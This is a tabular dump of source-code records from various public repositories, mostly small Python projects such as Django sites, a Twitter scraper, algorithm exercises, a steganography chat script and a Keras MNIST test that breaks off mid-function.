blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
09e0e639e78b5d589ce1b29c07d10a0f7a616734 | 45b64f620e474ac6d6b2c04fbad2730f67a62b8e | /Varsity-Final-Project-by-Django-master/.history/project/index/views_20210226000505.py | c8c780a29137164e7ee593f6beb0b9fcf9216d35 | [] | no_license | ashimmitra/Final-Project | 99de00b691960e25b1ad05c2c680015a439277e0 | a3e1d3c9d377e7b95b3eaf4dbf757a84a3858003 | refs/heads/master | 2023-04-11T06:12:35.123255 | 2021-04-26T15:41:52 | 2021-04-26T15:41:52 | 361,796,607 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | from django.shortcuts import render
from .model import AboutSite
def home(request):
aboutdata=AboutSite.objects.all()
context=[
'about'=
]
return render(request,"index.html")
def blog(request):
return render(request,"blog.html")
| [
"34328617+ashimmitra@users.noreply.github.com"
] | 34328617+ashimmitra@users.noreply.github.com |
11b059a875363c44c367c680d055a178be4e0f45 | 448d028fb4b4703f0be32e0e6780a389c13b3914 | /semaphore_example.py | a95d141ccab4b526b728c7a8687c06b03c191811 | [] | no_license | katryo/python-threading | 9453dd377d7ab4aebbdb3bc9c222b4fe4d3cf156 | f65ebe725f86463f2e97d9426d233257c91518cd | refs/heads/master | 2020-04-21T22:48:41.737864 | 2019-02-09T23:33:53 | 2019-02-09T23:33:53 | 169,925,250 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 546 | py | from threading import Semaphore, Thread
from datetime import datetime
from time import sleep
class Runner:
def run(self, sem):
for _ in range(3):
with sem:
print(datetime.now())
sleep(1)
if __name__ == '__main__':
sem = Semaphore(2)
runner = Runner()
thread_a = Thread(target=runner.run, args=(sem,))
thread_b = Thread(target=runner.run, args=(sem,))
thread_c = Thread(target=runner.run, args=(sem,))
thread_a.start()
thread_b.start()
thread_c.start()
| [
"katoryo55@gmail.com"
] | katoryo55@gmail.com |
b0766213ff36f4e3e57f2f14e1eac7fa6f65c9c3 | 13c14be20f16ffc14b7cde71ed8c4179e2410a0b | /algorithms/lisa-workbook.py | ac24edf42812ac4ec504b5bb62318e9c230d6018 | [] | no_license | gautamits/hackerrank | 79688e5735a27eed032ce0c34f4fe253cfb6b572 | aee6b00f4cd39c18e9107e933cceb55b9677c3c7 | refs/heads/master | 2020-05-21T22:55:50.977437 | 2018-12-11T05:09:36 | 2018-12-11T05:09:36 | 61,579,845 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 633 | py | #!/bin/python3
import math
import os
import random
import re
import sys
from itertools import count, zip_longest
# Complete the workbook function below.
def workbook(n, k, arr):
page=count(1)
return sum([len([1 for probs in zip_longest(*[iter(range(1, num_chpt_probs+1))]*k) if next(page) in probs]) for num_chpt_probs in arr])
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
nk = input().split()
n = int(nk[0])
k = int(nk[1])
arr = list(map(int, input().rstrip().split()))
result = workbook(n, k, arr)
fptr.write(str(result) + '\n')
fptr.close()
| [
"gautamamits95@gmail.com"
] | gautamamits95@gmail.com |
b89e6a9365194978cfa8663dd987ce19fe88410a | 72012dc3877b16b25f43cd62df1fc081c8f9299d | /my_site/views.py | 891f45eebcd96f9059c7081e4bfc31f47c753146 | [] | no_license | volitilov/wf_v2 | e12962bf1fbf3b6e73bd67bcccffc4e218575e5b | 1c2f585926f8258b208ad52f7ffa40576b4b37e2 | refs/heads/master | 2021-01-21T17:37:35.465356 | 2017-05-28T17:53:38 | 2017-05-28T17:53:38 | 91,968,903 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,151 | py | from django.template.context_processors import csrf
from django.shortcuts import redirect, render, get_object_or_404
from django.core.exceptions import ObjectDoesNotExist
from django.http import HttpResponse, HttpResponseRedirect
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from .models import Mesage, PortfolioItem
from .forms import ContactsForm
# Home page ::::::::::::::::::::::::::::::::::::::::::::::
def home(request):
data = {
'works': PortfolioItem.objects.all()[:3],
}
return render(request, 'pages/index.html', data)
# About page :::::::::::::::::::::::::::::::::::::::::::::
def about(request):
return render(request, 'pages/about.html', {})
# Portfolio page :::::::::::::::::::::::::::::::::::::::::
def portfolio(request):
data = {
'works': PortfolioItem.objects.all(),
}
return render(request, 'pages/portfolio.html', data)
# Info page ::::::::::::::::::::::::::::::::::::::::::::::
def info(request):
return render(request, 'pages/info.html', {})
# Services page ::::::::::::::::::::::::::::::::::::::::::
def services(request):
return render(request, 'pages/services.html', {})
# Contacts page ::::::::::::::::::::::::::::::::::::::::::
def contacts(request):
args = {}
args.update(csrf(request))
args['form'] = ContactsForm
if request.POST:
form = ContactsForm(request.POST)
if form.is_valid():
form.save()
import pdb; pdb.set_trace()
return render(request, 'pages/feedback.html', { 'name': form.cleaned_data['name'] })
else:
form = ContactsForm()
return render(request, 'pages/contacts.html', args)
# Work page ::::::::::::::::::::::::::::::::::::::::::::::
def work(request, pk):
# work_list = PortfolioItem.objects.all()
# paginator = Paginator(work_list, 1)
# page = request.GET.get('item')
# try:
# work = paginator.page(page)
# except PageNotAnInteger:
# work = paginator.page(1)
# except EmptyPage:
# work = paginator.page(paginator.num_pages)
works = PortfolioItem.objects.all()
work = get_object_or_404(PortfolioItem, pk=pk)
data = {
'works': works,
'work': work
}
return render(request, 'pages/work.html', data)
| [
"volitilov@gmail.com"
] | volitilov@gmail.com |
381fbd0dd22da0e55005395e2daaaf7acec16583 | a8b37bd399dd0bad27d3abd386ace85a6b70ef28 | /airbyte-integrations/bases/connector-acceptance-test/connector_acceptance_test/utils/compare.py | e71b1bafdc55d4db015a2835ce578c908a0db98f | [
"MIT",
"LicenseRef-scancode-free-unknown",
"Elastic-2.0"
] | permissive | thomas-vl/airbyte | 5da2ba9d189ba0b202feb952cadfb550c5050871 | 258a8eb683634a9f9b7821c9a92d1b70c5389a10 | refs/heads/master | 2023-09-01T17:49:23.761569 | 2023-08-25T13:13:11 | 2023-08-25T13:13:11 | 327,604,451 | 1 | 0 | MIT | 2021-01-07T12:24:20 | 2021-01-07T12:24:19 | null | UTF-8 | Python | false | false | 3,254 | py | #
# Copyright (c) 2023 Airbyte, Inc., all rights reserved.
#
import functools
from typing import List, Mapping, Optional
import dpath.exceptions
import dpath.util
import icdiff
import py
from pprintpp import pformat
MAX_COLS = py.io.TerminalWriter().fullwidth
MARGIN_LEFT = 20
GUTTER = 3
MARGINS = MARGIN_LEFT + GUTTER + 1
def diff_dicts(left, right, use_markup) -> Optional[List[str]]:
half_cols = MAX_COLS / 2 - MARGINS
pretty_left = pformat(left, indent=1, width=half_cols).splitlines()
pretty_right = pformat(right, indent=1, width=half_cols).splitlines()
diff_cols = MAX_COLS - MARGINS
if len(pretty_left) < 3 or len(pretty_right) < 3:
# avoid small diffs far apart by smooshing them up to the left
smallest_left = pformat(left, indent=2, width=1).splitlines()
smallest_right = pformat(right, indent=2, width=1).splitlines()
max_side = max(len(line) + 1 for line in smallest_left + smallest_right)
if (max_side * 2 + MARGIN_LEFT) < MAX_COLS:
diff_cols = max_side * 2 + GUTTER
pretty_left = pformat(left, indent=2, width=max_side).splitlines()
pretty_right = pformat(right, indent=2, width=max_side).splitlines()
differ = icdiff.ConsoleDiff(cols=diff_cols, tabsize=2)
if not use_markup:
# colorization is disabled in Pytest - either due to the terminal not
# supporting it or the user disabling it. We should obey, but there is
# no option in icdiff to disable it, so we replace its colorization
# function with a no-op
differ.colorize = lambda string: string
color_off = ""
else:
color_off = icdiff.color_codes["none"]
icdiff_lines = list(differ.make_table(pretty_left, pretty_right, context=True))
return ["equals failed"] + [color_off + line for line in icdiff_lines]
@functools.total_ordering
class HashMixin:
@staticmethod
def get_hash(obj):
if isinstance(obj, Mapping):
return hash(str({k: (HashMixin.get_hash(v)) for k, v in sorted(obj.items())}))
if isinstance(obj, List):
return hash(str(sorted([HashMixin.get_hash(v) for v in obj])))
return hash(obj)
def __hash__(self):
return HashMixin.get_hash(self)
def __lt__(self, other):
return hash(self) < hash(other)
def __eq__(self, other):
return hash(self) == hash(other)
class DictWithHashMixin(HashMixin, dict):
pass
class ListWithHashMixin(HashMixin, list):
pass
def delete_fields(obj: Mapping, path_list: List[str]) -> None:
for path in path_list:
try:
dpath.util.delete(obj, path)
except dpath.exceptions.PathNotFound:
pass
def make_hashable(obj, exclude_fields: List[str] = None) -> str:
"""
Simplify comparison of nested dicts/lists
:param obj value for comparison
:param exclude_fields if value is Mapping, some fields can be excluded
"""
if isinstance(obj, Mapping):
# If value is Mapping, some fields can be excluded
if exclude_fields:
delete_fields(obj, exclude_fields)
return DictWithHashMixin(obj)
if isinstance(obj, List):
return ListWithHashMixin(obj)
return obj
| [
"noreply@github.com"
] | thomas-vl.noreply@github.com |
6b910e42492be063380898c263fff9db242597d7 | bf2aa4eab14a6a5347fe4af65cc4a37f512a465d | /people/migrations/0185_auto_20211228_1012.py | f7d8a97b37ffb72adfa1415ed169341a3c45484d | [] | no_license | drdavidknott/betterstart | 0cda889f5cd6bb779f6d1fa75cb4f2ef08eb626c | 59e2f8282b34b7c75e1e19e1cfa276b787118adf | refs/heads/master | 2023-05-04T07:32:24.796488 | 2023-04-16T15:26:30 | 2023-04-16T15:26:30 | 173,626,906 | 0 | 0 | null | 2023-02-18T07:27:55 | 2019-03-03T20:37:01 | Python | UTF-8 | Python | false | false | 2,187 | py | # Generated by Django 3.1.13 on 2021-12-28 10:12
from django.db import migrations, models
import django.db.models.deletion
import people.django_extensions
class Migration(migrations.Migration):
dependencies = [
('people', '0184_survey_question_survey_question_type'),
]
operations = [
migrations.AlterModelOptions(
name='survey_question',
options={'ordering': ['survey_section__survey__name', 'survey_section__name', 'number'], 'verbose_name_plural': 'survey questions'},
),
migrations.CreateModel(
name='Survey_Submission',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField(blank=True, null=True)),
('person', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='people.person')),
('survey', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='people.survey')),
],
options={
'verbose_name_plural': 'survey submissions',
'ordering': ['-date'],
},
bases=(people.django_extensions.DataAccessMixin, models.Model),
),
migrations.CreateModel(
name='Survey_Answer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('range_answer', models.IntegerField(default=0)),
('text_answer', models.CharField(blank=True, default='', max_length=500)),
('survey_question', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='people.survey_question')),
('survey_submission', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='people.survey_submission')),
],
options={
'verbose_name_plural': 'survey answers',
'ordering': ['-survey_submission__date', '-survey_question__number'],
},
bases=(people.django_extensions.DataAccessMixin, models.Model),
),
]
| [
"dkoysta@gmail.com"
] | dkoysta@gmail.com |
8f0d1c6f1c3a8f8d9e42acba2344603fcafe173d | dc3d310934705034ab2f5bc4d3a96f07dab9b48b | /about_orm/app01/models.py | eb0e65d0120790442bd0561e2021c0df7c9e6ab5 | [] | no_license | createnewdemo/istudy_test | 82197488d9e9fa05e0c6cc91362645fc4555dc1d | 806693f2bee13e3c28571d0d75f6b6ea70acf7a0 | refs/heads/master | 2022-04-19T05:52:53.780973 | 2020-04-17T17:04:10 | 2020-04-17T17:04:10 | 256,507,355 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,957 | py | from django.db import models
# Create your models here.
class Person(models.Model):
pid = models.AutoField(primary_key=True)
name = models.CharField(db_column='nick',max_length=32,blank=True,null=True) #char
age = models.IntegerField()
birth = models.DateTimeField(auto_now=True)# 新增数据是自动保存
#auto_now_add=True 新增数据时自动保存当前的时间
#auto_now=True 新增和编辑 数据时自动保存当前的时间
class Meta:
# 数据库中生成的表名称 默认 app名称 + 下划线 + 类名
db_table = "Person"
# admin中显示的表名称
verbose_name = '个人信息'
# verbose_name加s
verbose_name_plural = '所有用户信息'
# # 联合索引
# index_together = [
# ("name", "age"), # 应为两个存在的字段
# ]
#
# # 联合唯一索引
# unique_together = (("name", "age"),) # 应为两个存在的字段
def __str__(self):
return "{}-{}".format(self.name,self.age)
class Publisher(models.Model):
name = models.CharField(max_length=32,verbose_name='出版社名称')
def __str__(self):
return "<Publisher object:{}-{}>".format(self.pk,self.name)
class Book(models.Model):
name = models.CharField(max_length=32,verbose_name='书名')
pub = models.ForeignKey(Publisher,on_delete=models.CASCADE,related_name='books',related_query_name='book')
price = models.DecimalField(max_digits=5,decimal_places=2) #999.99
sale = models.IntegerField()
repertory = models.IntegerField()#库存
def __str__(self):
return "<Book object:{}-{}>".format(self.pk,self.name)
class Author(models.Model):
name = models.CharField(max_length=32,verbose_name='姓名')
books = models.ManyToManyField('Book',related_name='authors')
def __str__(self):
return "<Author object:{}-{}>".format(self.pk,self.name)
| [
"320783214@qq.com"
] | 320783214@qq.com |
8f96c48c1e4bd9530d879ca2c31181ad9a56ae83 | 6e9f3e81af3ab66b10f8602544695ad9b035ffa5 | /jcoin/scripts/make-account.py | b95b671a8d4502546c79277eb6056937b88e1bef | [
"MIT"
] | permissive | slice/jose | 5ca7074e326e5fcffe7a1abfef249160644faa7c | 13e39b958f58fd024b3ba5b7ccd0a1cd7f02f14c | refs/heads/master | 2021-05-04T22:48:09.804518 | 2018-03-06T02:18:47 | 2018-03-06T02:18:47 | 99,070,186 | 0 | 0 | null | 2017-08-02T03:55:23 | 2017-08-02T03:55:23 | null | UTF-8 | Python | false | false | 198 | py | import requests
def main():
r = requests.post('http://0.0.0.0:8080/api/wallets/162819866682851329', json={
'type': 0,
})
print(r)
if __name__ == '__main__':
main()
| [
"lkmnds@gmail.com"
] | lkmnds@gmail.com |
4df461452801f2faf135f7c05f95ba61cea06067 | 9c6decc65c5dc7aed3aff66405cdafa3a750d8a5 | /Problem001-100/001 Multiples of 3 and 5.py | 7bd80a9209855897b4d5ae1373916f32144db95b | [] | no_license | Anfany/Project-Euler-by-Python3 | 9374a6a112843f03f7cda6b689a8fd7db7914a9d | 385e2c1c02b5e81111e054c3807911defde2dc29 | refs/heads/master | 2021-04-06T00:48:03.603738 | 2019-04-18T02:35:02 | 2019-04-18T02:35:02 | 124,505,893 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 190 | py | #!/usr/bin/python3.5
# -*- coding: UTF-8 -*-
#Author: AnFany
# Problem001 Multiples of 3 and 5
an=sum([i for i in range(1,1000) if i%3==0 or i%5==0])
print(an)
#答案:233168
| [
"noreply@github.com"
] | Anfany.noreply@github.com |
7355cb8b618bc1bf927c25c2ad8f74d161bec0bb | 6bf19501437a419bfb0b891a1ac55b52ab833b97 | /apps/master/actors/chat.py | c391adc38b6c2b7c8daffee794dcb38e1e27239d | [
"Apache-2.0"
] | permissive | jdelrue/digital_me | 330351edbfa5ffb931f5f0592c5738432c2eaa88 | 5e4699a3c94088fa089e0c1fefab9955cd6bd927 | refs/heads/master | 2020-04-07T16:56:53.703863 | 2018-07-31T13:08:30 | 2018-07-31T13:08:30 | 158,549,943 | 0 | 0 | NOASSERTION | 2018-11-21T13:11:28 | 2018-11-21T13:11:28 | null | UTF-8 | Python | false | false | 1,075 | py | from jumpscale import j
#BE CAREFUL MASTER IS IN: /code/github/threefoldtech/jumpscale_lib/JumpscaleLib/servers/gedis/base/actors/chat.py
JSBASE = j.application.jsbase_get_class()
class chat(JSBASE):
"""
"""
def __init__(self):
JSBASE.__init__(self)
self.chatbot = j.servers.gedis.latest.chatbot
#check self.chatbot.chatflows for the existing chatflows
#all required commands are here
def work_get(self, sessionid,schema_out):
"""
```in
sessionid = "" (S)
```
```out
cat = "" (S)
msg = "" (S)
```
"""
cat,msg = self.chatbot.session_work_get(sessionid)
return {"cat":cat,"msg":msg}
def work_report(self, sessionid, result):
"""
```in
sessionid = "" (S)
result = "" (S)
```
```out
```
"""
self.chatbot.session_work_set(sessionid,result)
def session_alive(self,sessionid,schema_out):
#TODO:*1 check if greenlet is alive
pass
| [
"kristof@incubaid.com"
] | kristof@incubaid.com |
51242aad84f877f6312483b22294f379050c32d6 | c8a7ccfb42628d1100562a053c4334488e1bf239 | /shell_cartesian_product.py | 6fa93aafa24d0d97ef46b832a619ec80dfc50343 | [
"CC0-1.0"
] | permissive | LyricLy/python-snippets | 8487619a916e33e02b5772aba577d9dafdfd803b | 9d868b7bbccd793ea1dc513f51290963584a1dee | refs/heads/master | 2020-04-08T01:57:22.511167 | 2018-11-24T08:12:20 | 2018-11-24T08:12:20 | 158,916,096 | 1 | 0 | CC0-1.0 | 2018-11-24T08:16:59 | 2018-11-24T08:16:59 | null | UTF-8 | Python | false | false | 624 | py | #!/usr/bin/env python3
# encoding: utf-8
import re as _re
def expand(str) -> (str, str):
"""expand a string containing one non-nested cartesian product strings into two strings
>>> expand('foo{bar,baz}')
('foobar', 'foobaz')
>>> expand('{old,new}')
('old', 'new')
>>> expand('uninteresting')
'uninteresting'
"""
match = _re.search(r'{([^{}]*),([^{}]*)}', str)
if match is None:
return str
return (
str[:match.start()] + match.group(1) + str[match.end():],
str[:match.start()] + match.group(2) + str[match.end():]
)
def _test():
import doctest
doctest.testmod()
if __name__ == '__main__':
_test()
| [
"bmintz@protonmail.com"
] | bmintz@protonmail.com |
c7efb64ec9be875434887caa7539ac4f76f26d5e | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02398/s216293399.py | f27ba33161028edb6af38fe51bdbad406e51b2e2 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 138 | py | from sys import stdin
a, b, c = [int(x) for x in stdin.readline().rstrip().split()]
print(len([x for x in range(a, b+1) if c % x == 0]))
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
5bed01a254bd62b699ed700ae1d181c947b9b35a | 3d19e1a316de4d6d96471c64332fff7acfaf1308 | /Users/B/buttub/basic_twitter_scraper_210.py | 9d1bd12d5fb4a5b4529a86e87666c11c1e6b964c | [] | no_license | BerilBBJ/scraperwiki-scraper-vault | 4e98837ac3b1cc3a3edb01b8954ed00f341c8fcc | 65ea6a943cc348a9caf3782b900b36446f7e137d | refs/heads/master | 2021-12-02T23:55:58.481210 | 2013-09-30T17:02:59 | 2013-09-30T17:02:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,288 | py | ###################################################################################
# Twitter scraper - designed to be forked and used for more interesting things
###################################################################################
import scraperwiki
import simplejson
import urllib2
# Change QUERY to your search term of choice.
# Examples: 'newsnight', 'from:bbcnewsnight', 'to:bbcnewsnight'
QUERY = 'from:thequote'
RESULTS_PER_PAGE = '100'
LANGUAGE = 'en'
NUM_PAGES = 20
for page in range(1, NUM_PAGES+1):
base_url = 'http://search.twitter.com/search.json?q=%s&rpp=%s&lang=%s&page=%s' \
% (urllib2.quote(QUERY), RESULTS_PER_PAGE, LANGUAGE, page)
try:
results_json = simplejson.loads(scraperwiki.scrape(base_url))
for result in results_json['results']:
data = {}
data['id'] = result['id']
data['text'] = result['text']
data['from_user'] = result['from_user']
print data['from_user'], data['text']
scraperwiki.sqlite.save(["id"], data)
except:
print 'Oh dear, failed to scrape %s' % base_url
###################################################################################
# Twitter scraper - designed to be forked and used for more interesting things
###################################################################################
import scraperwiki
import simplejson
import urllib2
# Change QUERY to your search term of choice.
# Examples: 'newsnight', 'from:bbcnewsnight', 'to:bbcnewsnight'
QUERY = 'from:thequote'
RESULTS_PER_PAGE = '100'
LANGUAGE = 'en'
NUM_PAGES = 20
for page in range(1, NUM_PAGES+1):
base_url = 'http://search.twitter.com/search.json?q=%s&rpp=%s&lang=%s&page=%s' \
% (urllib2.quote(QUERY), RESULTS_PER_PAGE, LANGUAGE, page)
try:
results_json = simplejson.loads(scraperwiki.scrape(base_url))
for result in results_json['results']:
data = {}
data['id'] = result['id']
data['text'] = result['text']
data['from_user'] = result['from_user']
print data['from_user'], data['text']
scraperwiki.sqlite.save(["id"], data)
except:
print 'Oh dear, failed to scrape %s' % base_url
| [
"pallih@kaninka.net"
] | pallih@kaninka.net |
7d254cf76a88c8dfee2d600c08809f29ae21763e | d7e131777d76b98d76cc3a37f96313282b1ad69c | /functions.py | 856222fe9fdc0a66c0ab04d04595eca664c857c5 | [] | no_license | prashararchi/spy-chat | bd7e71bbcb627c075e196f1c487d8039ac843db4 | 9d2cb9a81f78ac7afc08642d6669988d3ee67500 | refs/heads/master | 2020-12-02T22:10:09.834229 | 2017-07-03T10:04:17 | 2017-07-03T10:04:17 | 96,092,079 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,494 | py | from spy_details import*
from steganography.steganography import Steganography
from colorama import init,Fore,Style
from datetime import datetime
#reading chat_history
def read_chat_history():
read_for = select_friend()
for chat in friends[read_for].chats:
if chat.sent_by_me:
init(autoreset=True)
msg_chat=Fore.BLUE+chat.time.strftime("%d %b %y")
print '[%s] %s: %s' %(msg_chat ,'You said:' ,chat.message)
else:
print '[%s] %s said: %s' % (msg_chat, friends[read_for].name, chat.message)
#starting chat
def start_chat(user):
result = True
while result:
choice = menu_choices()
# checking the choices.
if (choice == 1):
add_status()
elif(choice == 2):
add_friend()
elif(choice == 3):
send_message()
elif(choice == 4):
read_message()
elif(choice == 5):
read_chat_history()
elif(choice == 6):
result = False
else:
print ("Wrong choice.Sorry you are not of the correct age to be a spy")
#introducing menu_choice
def menu_choices():
print("1. Add a status")
print("2. Add a friend")
print("3. Send a secret message")
print("4. Receive/Read secret message")
print("5. Read chat History")
print("6. Exit Application.")
choice = int(raw_input("Enter your choice: "))
# return choice
return choice
#adding status
def add_status():
all_status = ['available', 'sleeping', 'at work']
choice = int(raw_input("press 1 to add new status or press other key to add other status"))
if choice == 1:
current_status = raw_input("enter new status")
all_status.append(current_status)
else:
count = 1
for temp in all_status:
print("%d %s" % (count, temp))
count += 1
choose = int(raw_input("which status you want?"))
current_status = all_status[choose - 1]
#adding friend
def add_friend():
new_friend = Spy('','',0,0.0)
new_friend.name = raw_input("enter friends name")
new_friend.salutation = raw_input("enter mr or ms")
new_friend.age =int(raw_input("enter age"))
new_friend.rating = float(raw_input("enter rating"))
if len(new_friend.name) > 0 and new_friend.age > 12 :
friends.append(new_friend)
else:
print 'Invalid entry. We cant add spy with the details you provided'
return len(friends)
#selecting friend
def select_friend():
item = 0
for friend in friends:
print (friend.name, friend.age,friend.rating)
item = item + 1
#selecting friends.
friend_choice = int(raw_input("choose: "))
frnd = int(friend_choice) - 1
return friend_choice
#sending message
def send_message():
friend_choice = select_friend()
original_image='nature.jpg'
output_path ='output.jpg'
#its secret message
text = 'YOO I DID IT.FINALLY I AM FEELING GOOD'
Steganography.encode(original_image,output_path,text)
new_chat = chat_message(text , True)
friends[friend_choice].chats.append(new_chat)
print ("Your secret message is ready")
send_message()
#reading message
def read_message():
sender = select_friend()
output_path =("output.jpg")
get = Steganography.decode(output_path)
print get
new_chat = chat_message( get,False)
friends[sender].chats.append(new_chat)
print("your message has been sent")
read_message()
| [
"="
] | = |
a78dbd6d284e4a6f01a1019211971bc9c0c8c61b | 0d942316070509955bad7ee774ac417e5c7b1235 | /datastructures/minheap.py | 34ab3809f1483e9783635f1a0761b4eb078ad011 | [] | no_license | rlavanya9/hackerrank | 4750ad48d5d249f1d58e6eff205e585f17e6a78b | 64e6686df62c1f1cdaa7dfb6d0c4525d236c197b | refs/heads/master | 2023-03-24T15:50:41.616353 | 2021-03-19T17:26:54 | 2021-03-19T17:26:54 | 349,502,745 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,044 | py | """
Min Heap Implementation in Python
"""
class MinHeap:
def __init__(self):
"""
On this implementation the heap list is initialized with a value
"""
self.heap_list = [0]
self.current_size = 0
def sift_up(self, i):
"""
Moves the value up in the tree to maintain the heap property.
"""
# While the element is not the root or the left element
while i // 2 > 0:
# If the element is less than its parent swap the elements
if self.heap_list[i] < self.heap_list[i // 2]:
self.heap_list[i], self.heap_list[i // 2] = self.heap_list[i // 2], self.heap_list[i]
# Move the index to the parent to keep the properties
i = i // 2
def insert(self, k):
"""
Inserts a value into the heap
"""
# Append the element to the heap
self.heap_list.append(k)
# Increase the size of the heap.
self.current_size += 1
# Move the element to its position from bottom to the top
self.sift_up(self.current_size)
def sift_down(self, i):
# if the current node has at least one child
while (i * 2) <= self.current_size:
# Get the index of the min child of the current node
mc = self.min_child(i)
# Swap the values of the current element is greater than its min child
if self.heap_list[i] > self.heap_list[mc]:
self.heap_list[i], self.heap_list[mc] = self.heap_list[mc], self.heap_list[i]
i = mc
def min_child(self, i):
# If the current node has only one child, return the index of the unique child
if (i * 2)+1 > self.current_size:
return i * 2
else:
# Herein the current node has two children
# Return the index of the min child according to their values
if self.heap_list[i*2] < self.heap_list[(i*2)+1]:
return i * 2
else:
return (i * 2) + 1
def delete_min(self):
# Equal to 1 since the heap list was initialized with a value
if len(self.heap_list) == 1:
return 'Empty heap'
# Get root of the heap (The min value of the heap)
root = self.heap_list[1]
# Move the last value of the heap to the root
self.heap_list[1] = self.heap_list[self.current_size]
# Pop the last value since a copy was set on the root
*self.heap_list, _ = self.heap_list
# Decrease the size of the heap
self.current_size -= 1
# Move down the root (value at index 1) to keep the heap property
self.sift_down(1)
# Return the min value of the heap
return root
"""
Driver program
"""
# Same tree as above example.
my_heap = MinHeap()
my_heap.insert(5)
my_heap.insert(6)
my_heap.insert(7)
my_heap.insert(9)
my_heap.insert(13)
my_heap.insert(11)
my_heap.insert(10)
print(my_heap.delete_min()) # removing min node i.e 5 | [
"rangaswamy.lavanya@gmail.com"
] | rangaswamy.lavanya@gmail.com |
cd3e76b86f9d33e10b10335157e5d340ce734962 | 0fdc732fcdad1c0d76d6ec80cb6e25b6ec17d6e1 | /generic_views/display_views/models.py | 09bf2b21330b7de58380a241d44bb9f07e61cb04 | [
"MIT"
] | permissive | markbirds/Django-Code-Repo | 9b3c8bfba948dd8ea1be71e31cbfd2ef26bfa157 | b55762d2dab00640acf2e8e00ddc66716d53c6b5 | refs/heads/master | 2023-01-05T22:44:16.405853 | 2020-11-03T07:17:50 | 2020-11-03T07:17:50 | 299,615,438 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 459 | py | import uuid
from django.db import models
class DisplayViewModel(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
name = models.CharField(unique=True,max_length=50)
age = models.IntegerField()
def get_absolute_url(self):
from django.urls import reverse
return reverse('display_views:detail_view', args=[str(self.id)])
def __str__(self):
return f'{self.name} - {self.id}'
| [
"fowenpatrick@gmail.com"
] | fowenpatrick@gmail.com |
b6edf643e623372579197f494e3f4691341ddcb7 | 4d56399b01d06946024822edcdf2b45bbc1dfe8f | /tests/app/TestMnistFlow.py | 8f88a7e2bb5e318f3bfeb41e1b6c8a2ca68253c7 | [] | no_license | fletch22/nba_win_predictor | 961b520b50cd5bebceb8c5d2bc91bc0dc71715ef | aff78780aca8a54c22e904cdcdee569278d4f5fc | refs/heads/master | 2023-08-11T02:44:22.613419 | 2020-04-09T21:32:38 | 2020-04-09T21:32:38 | 181,233,092 | 0 | 0 | null | 2021-08-25T14:57:49 | 2019-04-13T22:01:58 | Python | UTF-8 | Python | false | false | 2,443 | py | import warnings
from app.models.mnist_pretrained import get_vgg16_for_mnist
warnings.filterwarnings('ignore')
import os
from unittest import TestCase
from keras.layers import Convolution2D, MaxPooling2D
from keras.layers import Flatten, Dense
from keras.models import Sequential
from keras.preprocessing.image import ImageDataGenerator
from app.config import config
dimension = 44
img_width, img_height = dimension, dimension
train_data_dir = os.path.join(config.DATA_FOLDER_PATH, 'mnist', 'train')
validation_data_dir = os.path.join(config.DATA_FOLDER_PATH, 'mnist', 'test')
train_samples = 60000
validation_samples = 10000
epoch = 30
batch_size = 32
class TestMnistFlow(TestCase):
def get_model_simple(self):
model = Sequential()
model.add(Convolution2D(16, 5, 5, activation='relu', input_shape=(img_width, img_height, 3)))
model.add(MaxPooling2D(2, 2))
model.add(Convolution2D(32, 5, 5, activation='relu'))
model.add(MaxPooling2D(2, 2))
model.add(Flatten())
model.add(Dense(1000, activation='relu'))
model.add(Dense(10, activation='softmax'))
# ** Model Ends **
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
return model
def test_flow(self):
